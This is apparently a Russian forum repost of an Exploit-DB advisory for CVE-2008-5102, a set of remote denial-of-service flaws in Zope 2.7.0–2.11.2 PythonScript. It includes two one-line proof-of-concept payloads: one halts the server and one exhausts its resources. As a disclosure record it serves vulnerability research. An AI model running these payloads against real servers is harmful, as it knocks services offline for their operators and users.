Exploit Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32581
Проверка EDB
  1. Пройдено
Автор
MARC-ANDRE LEMBURG
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
cve-2008-5102
Дата публикации
2008-11-12
Код:
source: https://www.securityfocus.com/bid/32267/info

Zope is prone to multiple remote denial-of-service vulnerabilities.

Remote attackers can exploit this issue to cause the Zope server to halt or to consume excessive server resources, resulting in denial-of-service conditions.

These issues affect Zope 2.7.0 through 2.11.2. 

To halt the application:
raise SystemExit

To consume excessive resources:
return 'foo'.encode('test.testall')
 
Источник
www.exploit-db.com

Похожие темы